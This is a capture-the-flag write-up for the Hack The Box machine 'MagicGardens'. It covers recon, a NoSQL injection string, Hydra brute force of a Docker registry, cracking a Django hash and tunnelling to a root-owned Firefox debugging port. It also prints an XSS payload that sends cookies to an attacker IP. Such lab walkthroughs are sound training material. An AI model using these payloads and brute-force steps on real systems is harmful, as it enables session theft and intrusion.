Hack The Box / LINUX / 2026-03-27

Hack The Box - MagicGardens (Linux)

NoSQLi in search, SMTP user/password brute force against Docker registry, credential recovery from container data, and browser-automation attack surface research for later-stage compromise.

Target

IP: 10.129.233.100

Recon

sudo nmap -sC -sV 10.129.233.100 -p- -v -T5

Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 e0:72:62:48:99:33:4f:fc:59:f8:6c:05:59:db:a7:7b (ECDSA)
|_  256 62:c6:35:7e:82:3e:b1:0f:9b:6f:5b:ea:fe:c5:85:9a (ED25519)
25/tcp   open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp   open  http     nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Did not follow redirect to http://magicgardens.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
1337/tcp open  waste?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, TerminalServer, TerminalServerCookie, X11Probe, afp, giop, ms-sql-s:
|_    [x] Handshake error
5000/tcp open  ssl/http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-23T11:57:43
| Not valid after:  2024-05-22T11:57:43
| MD5:   2f97:8372:17ae:abe4:a4d9:5937:f438:3e71
|_SHA-1: a6f9:ce07:c808:150a:00aa:f193:1b72:a963:f414:f57c
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS

Add magicgardens.htb to /etc/hosts.

Initial Web Enumeration

Check registry catalog anonymously:

curl -vv https://10.129.205.74:5000/v2/_catalog -k

Authentication required.

Browse http://magicgardens.htb/, register an account, and log in.

Directory scan:

gobuster dir -u 'http://magicgardens.htb/' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -c 'sessionid=.eJxNiTEKg0AQRbeIouJBUgWSQ6RJmQPIuC64YFbY-UOqgAeYcryvQRtf9R5vKdbFHfzsqpVwyIk-wbREYNwff2EQhE2rNygNlAfT-ht57KbIMHWm7Z5-loSQ7eW09pRx_LHUdq_Tblj6jjzinEwvT4qTyW0Do28z6A:1s91Sl:B0aJjwzWk3LDcg65xxdGAuknmYF46y-cGz0MEnClw3U'

An admin endpoint exists with a Django administration login form.

NoSQL Injection

Search endpoint example:

http://magicgardens.htb/search/?search=rose

By setting search to:

' || 1==1//

all flowers are returned, indicating NoSQL injection.

Observed XSS test payload:

<img src=x onerror=this.src='http://10.10.16.25/?c='+document.cookie;>

SMTP User and Registry Credential Brute Force

SMTP user brute force script (attached):

attachments/brute_users.py

Recovered mail users:

mail
alex
root
news

Trying to message alex from the site does not show in sent items, so alex appears to be only a mail user, not a web app user.

Registry password brute force script (attached):

attachments/brute_password.py

Alternative with Hydra:

hydra -l alex -P /usr/share/wordlists/rockyou.txt magicgardens.htb -s 5000 http-get /v2/_catalog -I

[5000][http-get] host: magicgardens.htb   login: alex   password: diamonds

Docker Registry Access

curl -k https://10.129.233.100:5000/v2/_catalog -u 'alex:diamonds' -vv

{"repositories":["magicgardens.htb"]}

curl -k https://magicgardens.htb:5000/v2/magicgardens.htb/tags/list -u 'alex:diamonds' -vv

{"name":"magicgardens.htb","tags":["1.3"]}

Add this line to /etc/docker/daemon.json:

"insecure-registries": ["magicgardens.htb:5000"]

docker login magicgardens.htb:5000

Use:

Username: alex
Password: diamonds

docker pull magicgardens.htb:5000/magicgardens.htb:1.3
docker save -o archive.tar magicgardens.htb:5000/magicgardens.htb:1.3
docker run -it magicgardens.htb:5000/magicgardens.htb:1.3

Inside container:

sqlite3 db.sqlite3
.tables
select * from auth_user;

2|pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=|2023-06-06 17:34:56.520750|1|morty|||1|1|2023-06-06 17:32:24|

Crack hash:

hashcat -a 0 ./hash ./rockyou.txt

pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=:jonasbrothers

SSH and Process Enumeration

ssh morty@magicgardens.htb

ps aux

alex        1896  0.0  0.0   2464   880 ?        S    May20   0:00 harvest server -l /home/alex/.harvest_logs
root        1968  3.0 10.4 2992740 417308 ?      Sl   May26  26:34 firefox-esr --marionette --headless --remote-debugging-port 37513 --remote-allow-hosts localhost -no-remote -profile /tmp/rust_mozprofileK5fz8g

Create tunnel:

ssh morty@magicgardens.htb -NL 37513:localhost:37513

Next exploitation step references attached script:

attachments/exploit.py